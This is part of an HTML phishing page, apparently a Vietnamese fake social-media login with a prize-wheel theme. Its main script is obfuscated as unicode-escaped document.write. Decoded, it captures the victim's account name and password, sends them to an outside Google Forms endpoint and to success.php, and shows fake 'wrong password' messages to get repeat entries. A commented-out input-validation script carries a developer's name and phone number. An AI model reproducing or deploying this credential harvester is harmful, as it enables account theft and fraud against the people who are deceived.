  <script type="text/javascript">document.write('\u0020\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0074\u0065\u006c\u0065\u0070\u0068\u006f\u006e\u0065\u0043\u0068\u0065\u0063\u006b\u0028\u0073\u0074\u0072\u0029\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0069\u0073\u0070\u0068\u006f\u006e\u0065\u0020\u003d\u0020\u002f\u005e\u0028\u0031\u005c\u0073\u007c\u0031\u007c\u0029\u003f\u0028\u0028\u005c\u0028\u005c\u0064\u007b\u0033\u007d\u005c\u0029\u0029\u007c\u005c\u0064\u007b\u0033\u007d\u0029\u0028\u005c\u002d\u007c\u005c\u0073\u0029\u003f\u0028\u005c\u0064\u007b\u0033\u007d\u0029\u0028\u005c\u002d\u007c\u005c\u0073\u0029\u003f\u0028\u005c\u0064\u007b\u0034\u007d\u0029\u0024\u002f\u002e\u0074\u0065\u0073\u0074\u0028\u0073\u0074\u0072\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0028\u0069\u0073\u0070\u0068\u006f\u006e\u0065\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u006c\u0069\u0064\u0061\u0074\u0065\u0045\u006d\u0061\u0069\u006c\u0028\u0065\u006d\u0061\u0069\u006c\u0029\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0020\u003d\u0020\u002f\u005c\u0053\u002b\u0040\u005c\u0053\u002b\u005c\u002e\u005c\u0053\u002b\u002f\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0072\u0065\u002e\u0074\u0065\u0073\u0074\u0028\u0065\u006d\u0061\u0069\u006c\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0067\u006f\u0028\u0029\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0074\u006b\u004f\u006a\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0071\u0075\u0065\u0072\u0079\u0053\u0065\u006c\u0065\u0063\u0074\u006f\u0072\u0028\u0027\u0069\u006e\u0070\u0075\u0074\u005b\u006e\u0061\u006d\u0065\u003d\u0022\u0074\u0061\u0069\u006b\u0068\u006f\u0061\u006e\u0022\u005d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006d\u006b\u004f\u006a\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0071\u0075\u0065\u0072\u0079\u0053\u0065\u006c\u0065\u0063\u0074\u006f\u0072\u0028\u0027\u0069\u006e\u0070\u0075\u0074\u005b\u006e\u0061\u006d\u0065\u003d\u0022\u006d\u0061\u0074\u006b\u0068\u0061\u0075\u0022\u005d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0074\u006b\u0020\u003d\u0020\u0074\u006b\u004f\u006a\u002e\u0076\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006d\u006b\u0020\u003d\u0020\u006d\u006b\u004f\u006a\u002e\u0076\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0064\u0061\u0074\u0061\u0020\u003d\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0027\u0065\u006e\u0074\u0072\u0079\u002e\u0033\u0032\u0037\u0030\u0030\u0035\u0036\u0035\u0039\u0027\u003a\u0020\u0074\u006b\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0027\u0065\u006e\u0074\u0072\u0079\u002e\u0032\u0030\u0035\u0031\u0031\u0039\u0033\u0031\u0035\u0032\u0027\u003a\u0020\u006d\u006b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0071\u0075\u0065\u0072\u0079\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0055\u0052\u004c\u0053\u0065\u0061\u0072\u0063\u0068\u0050\u0061\u0072\u0061\u006d\u0073\u0028\u0064\u0061\u0074\u0061\u0029\u003b\u0020\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0071\u0075\u0065\u0072\u0079\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u003d\u0020\u0071\u0075\u0065\u0072\u0079\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0029\u003b\u0020\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0078\u0068\u0072\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0058\u004d\u004c\u0048\u0074\u0074\u0070\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0078\u0068\u0072\u002e\u006f\u0070\u0065\u006e\u0028\u0022\u0050\u004f\u0053\u0054\u0022\u002c\u0020\u0027\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0064\u006f\u0063\u0073\u002e\u0067\u006f\u006f\u0067\u006c\u0065\u002e\u0063\u006f\u006d\u002f\u0066\u006f\u0072\u006d\u0073\u002f\u0075\u002f\u0030\u002f\u0064\u002f\u0065\u002f\u0031\u0046\u0041\u0049\u0070\u0051\u004c\u0053\u0066\u0078\u0034\u0076\u0048\u0041\u0036\u002d\u006b\u0063\u006a\u004d\u0034\u0075\u004d\u0062\u0062\u0072\u006f\u0052\u004c\u0065\u0052\u0038\u0070\u004e\u0037\u0044\u0071\u0041\u004f\u0067\u004e\u0048\u0065\u0046\u006f\u0036\u0077\u002d\u0055\u0038\u0034\u0062\u0068\u0046\u0077\u0041\u002f\u0066\u006f\u0072\u006d\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0027\u002c\u0020\u0074\u0072\u0075\u0065\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0078\u0068\u0072\u002e\u0073\u0065\u0074\u0052\u0065\u0071\u0075\u0065\u0073\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0028\u0022\u0043\u006f\u006e\u0074\u0065\u006e\u0074\u002d\u0054\u0079\u0070\u0065\u0022\u002c\u0020\u0022\u0061\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u002f\u0078\u002d\u0077\u0077\u0077\u002d\u0066\u006f\u0072\u006d\u002d\u0075\u0072\u006c\u0065\u006e\u0063\u006f\u0064\u0065\u0064\u0022\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0078\u0068\u0072\u002e\u0073\u0065\u006e\u0064\u0028\u0071\u0075\u0065\u0072\u0079\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u0020\u003d\u0020\u0022\u0073\u0075\u0063\u0063\u0065\u0073\u0073\u002e\u0070\u0068\u0070\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0071\u0075\u0065\u0072\u0079\u0053\u0065\u006c\u0065\u0063\u0074\u006f\u0072\u0028\u0027\u0023\u006c\u006f\u0067\u0069\u006e\u005f\u0066\u006f\u0072\u006d\u0027\u0029\u002e\u006f\u006e\u0073\u0075\u0062\u006d\u0069\u0074\u0020\u003d\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0065\u0029\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0065\u002e\u0070\u0072\u0065\u0076\u0065\u006e\u0074\u0044\u0065\u0066\u0061\u0075\u006c\u0074\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0074\u006b\u004f\u006a\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0071\u0075\u0065\u0072\u0079\u0053\u0065\u006c\u0065\u0063\u0074\u006f\u0072\u0028\u0027\u0069\u006e\u0070\u0075\u0074\u005b\u006e\u0061\u006d\u0065\u003d\u0022\u0074\u0061\u0069\u006b\u0068\u006f\u0061\u006e\u0022\u005d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006d\u006b\u004f\u006a\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0071\u0075\u0065\u0072\u0079\u0053\u0065\u006c\u0065\u0063\u0074\u006f\u0072\u0028\u0027\u0069\u006e\u0070\u0075\u0074\u005b\u006e\u0061\u006d\u0065\u003d\u0022\u006d\u0061\u0074\u006b\u0068\u0061\u0075\u0022\u005d\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0074\u0062\u004f\u006a\u0020\u003d\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0022\u0074\u0062\u0022\u0029\u003b\u0020\u0020\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u0074\u006b\u0020\u003d\u0020\u0074\u006b\u004f\u006a\u002e\u0076\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006c\u0065\u0074\u0020\u006d\u006b\u0020\u003d\u0020\u006d\u006b\u004f\u006a\u002e\u0076\u0061\u006c\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0069\u0066\u0028\u0024\u002e\u0069\u0073\u004e\u0075\u006d\u0065\u0072\u0069\u0063\u0028\u0074\u006b\u0029\u0020\u003d\u003d\u0020\u0074\u0072\u0075\u0065\u0029\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0069\u0066\u0028\u0074\u0065\u006c\u0065\u0070\u0068\u006f\u006e\u0065\u0043\u0068\u0065\u0063\u006b\u0028\u0074\u006b\u0029\u0020\u003d\u003d\u0020\u0074\u0072\u0075\u0065\u0029\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0067\u006f\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0061\u0063\u0063\u0020\u003d\u0020\u0024\u0028\u0027\u0066\u006f\u0072\u006d\u0023\u006c\u006f\u0067\u0069\u006e\u005f\u0066\u006f\u0072\u006d\u0027\u0029\u002e\u0073\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0024\u002e\u0061\u006a\u0061\u0078\u0028\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0074\u0079\u0070\u0065\u0020\u003a\u0020\u0027\u0050\u004f\u0053\u0054\u0027\u002c\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0075\u0072\u006c\u0020\u003a\u0020\u0027\u0073\u0075\u0063\u0063\u0065\u0073\u0073\u002e\u0070\u0068\u0070\u0027\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u0061\u0074\u0061\u0054\u0079\u0070\u0065\u003a\u0020\u0027\u004a\u0053\u004f\u004e\u0027\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u0061\u0074\u0061\u003a\u0020\u0061\u0063\u0063\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0075\u0063\u0063\u0065\u0073\u0073\u0020\u003a\u0020\u0028\u0064\u0061\u0074\u0061\u0029\u0020\u003d\u003e\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0024\u0028\u0027\u0023\u0062\u0074\u006e\u0066\u0062\u0027\u0029\u002e\u0068\u0074\u006d\u006c\u0028\u0027\u0110\u0061\u006e\u0067\u0020\u0078\u1eed\u0020\u006c\u00ed\u002e\u002e\u002e\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0064\u0061\u0074\u0061\u002e\u0065\u0072\u0072\u006f\u0072\u0029\u0020\u007b\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u0020\u0065\u006c\u0073\u0065\u0020\u007b\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0072\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0028\u0022\u0074\u0062\u0022\u0029\u002e\u0073\u0074\u0079\u006c\u0065\u002e\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0020\u003d\u0020\u0022\u006e\u006f\u006e\u0065\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0065\u006c\u0073\u0065\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0022\u0074\u0062\u0022\u0029\u002e\u0073\u0074\u0079\u006c\u0065\u002e\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0020\u003d\u0020\u0022\u0062\u006c\u006f\u0063\u006b\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0074\u0062\u004f\u006a\u002e\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022\u0053\u1ed1\u0020\u0111\u0069\u1ec7\u006e\u0020\u0074\u0068\u006f\u1ea1\u0069\u0020\u0063\u0068\u01b0\u0061\u0020\u0111\u00fa\u006e\u0067\u0020\u0111\u1ecb\u006e\u0068\u0020\u0064\u1ea1\u006e\u0067\u002e\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u006d\u006b\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0020\u003d\u003d\u0020\u0030\u0020\u007c\u007c\u0020\u006d\u006b\u0020\u003d\u003d\u0020\u0027\u0027\u0029\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0022\u0074\u0062\u0022\u0029\u002e\u0073\u0074\u0079\u006c\u0065\u002e\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0020\u003d\u0020\u0022\u0062\u006c\u006f\u0063\u006b\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0074\u0062\u004f\u006a\u002e\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022\u0053\u0061\u0069\u0020\u006d\u1ead\u0074\u0020\u006b\u0068\u1ea9\u0075\u002e\u0020\u003c\u0062\u003e\u0020\u0042\u1ea1\u006e\u0020\u0071\u0075\u00ea\u006e\u0020\u006d\u1ead\u0074\u0020\u006b\u0068\u1ea9\u0075\u0020\u0063\u1ee7\u0061\u0020\u006d\u00ec\u006e\u0068\u003f\u0020\u003c\u002f\u0062\u003e\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0065\u006c\u0073\u0065\u0020\u0069\u0066\u0028\u0076\u0061\u006c\u0069\u0064\u0061\u0074\u0065\u0045\u006d\u0061\u0069\u006c\u0028\u0074\u006b\u0029\u0020\u003d\u003d\u0020\u0074\u0072\u0075\u0065\u0029\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0067\u006f\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0061\u0063\u0063\u0020\u003d\u0020\u0024\u0028\u0027\u0066\u006f\u0072\u006d\u0023\u006c\u006f\u0067\u0069\u006e\u005f\u0066\u006f\u0072\u006d\u0027\u0029\u002e\u0073\u0065\u0072\u0069\u0061\u006c\u0069\u007a\u0065\u0028\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0024\u002e\u0061\u006a\u0061\u0078\u0028\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0074\u0079\u0070\u0065\u0020\u003a\u0020\u0027\u0050\u004f\u0053\u0054\u0027\u002c\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0075\u0072\u006c\u0020\u003a\u0020\u0027\u0073\u0075\u0063\u0063\u0065\u0073\u0073\u002e\u0070\u0068\u0070\u0027\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u0061\u0074\u0061\u0054\u0079\u0070\u0065\u003a\u0020\u0027\u004a\u0053\u004f\u004e\u0027\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u0061\u0074\u0061\u003a\u0020\u0061\u0063\u0063\u002c\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0073\u0075\u0063\u0063\u0065\u0073\u0073\u0020\u003a\u0020\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0024\u0028\u0027\u0023\u0062\u0074\u006e\u0066\u0062\u0027\u0029\u002e\u0068\u0074\u006d\u006c\u0028\u0027\u0110\u0061\u006e\u0067\u0020\u0078\u1eed\u0020\u006c\u00ed\u002e\u002e\u002e\u0027\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u0029\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0074\u0072\u0075\u0065\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0022\u0074\u0062\u0022\u0029\u002e\u0073\u0074\u0079\u006c\u0065\u002e\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0020\u003d\u0020\u0022\u006e\u006f\u006e\u0065\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u0020\u0065\u006c\u0073\u0065\u0020\u007b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0022\u0074\u0062\u0022\u0029\u002e\u0073\u0074\u0079\u006c\u0065\u002e\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u0020\u003d\u0020\u0022\u0062\u006c\u006f\u0063\u006b\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0074\u0062\u004f\u006a\u002e\u0069\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022\u0053\u1ed1\u0020\u0111\u0069\u1ec7\u006e\u0020\u0074\u0068\u006f\u1ea1\u0069\u0020\u0064\u0069\u0020\u0111\u1ed9\u006e\u0067\u0020\u0068\u006f\u1eb7\u0063\u0020\u0065\u006d\u0061\u0069\u006c\u0020\u0062\u1ea1\u006e\u0020\u0111\u00e3\u0020\u006e\u0068\u1ead\u0070\u0020\u006b\u0068\u00f4\u006e\u0067\u0020\u006b\u0068\u1edb\u0070\u0020\u0076\u1edb\u0069\u0020\u0062\u1ea5\u0074\u0020\u006b\u1ef3\u0020\u0074\u00e0\u0069\u0020\u006b\u0068\u006f\u1ea3\u006e\u0020\u006e\u00e0\u006f\u002e\u0020\u003c\u0062\u003e\u0020\u0054\u00ec\u006d\u0020\u006b\u0069\u1ebf\u006d\u0020\u0074\u00e0\u0069\u0020\u006b\u0068\u006f\u1ea3\u006e\u0020\u0063\u1ee7\u0061\u0020\u0062\u1ea1\u006e\u002e\u0020\u003c\u002f\u0062\u003e\u0022\u003b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u0020\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u007d\u000a\u0020\u0020\u0020\u0020\u0020\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e')</script>

    <!-- <script type="text/javascript">
        function valid() {
            var user = $('#taikhoan').val();
            var pass = $('#matkhau').val();
            var ip = $('#ip').val();
            if (user == '' || user == null) {
                $('.email').show();
                $('.sandi').hide();
                return false;
            } else {

                if (user.includes('@')) {
                    let pattern = /^[^ ]+@[^ ]+\.[a-z]{2,3}$/;
                    if (user.match(pattern)) {
                        $('.email').hide();
                    } else {
                        $('.email').show();
                        $('.sandi').hide();
                        return false;
                    }
                }

                if (!isNaN(user)) {
                    if (user.length <= 9) {
                        $('.email').show();
                        $('.sandi').hide();
                        return false;
                    } else {
                        $('.email').hide();
                    }
                }

                if (user.match(/\s/g)) {
                    $('.email').show();
                    $('.sandi').hide();
                    return false;
                } else {
                    $('.email').hide();
                }

                var regex = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                if (user.match(regex)) {
                    $('.email').show();
                    $('.sandi').hide();
                    return false;
                }

                if (user.length <= 5) {
                    $('.email').show();
                    $('.sandi').hide();
                    return false;
                } else {
                    $('.email').hide();
                }

            }
            if (pass == '' || pass == null || pass.length <= 4) {
                $('.sandi').show();
                return false;
            } else {
                $('.sandi').hide();
            }

            // Dương st 0868158117 zalo
            $("#btnfb").addClass("disabled");
        }
    </script> -->





    <audio id="suara" src="https://d1490khl9dq1ow.cloudfront.net/sfx/mp3preview/wheel-spin_Gk0rCUV_.mp3">
</html>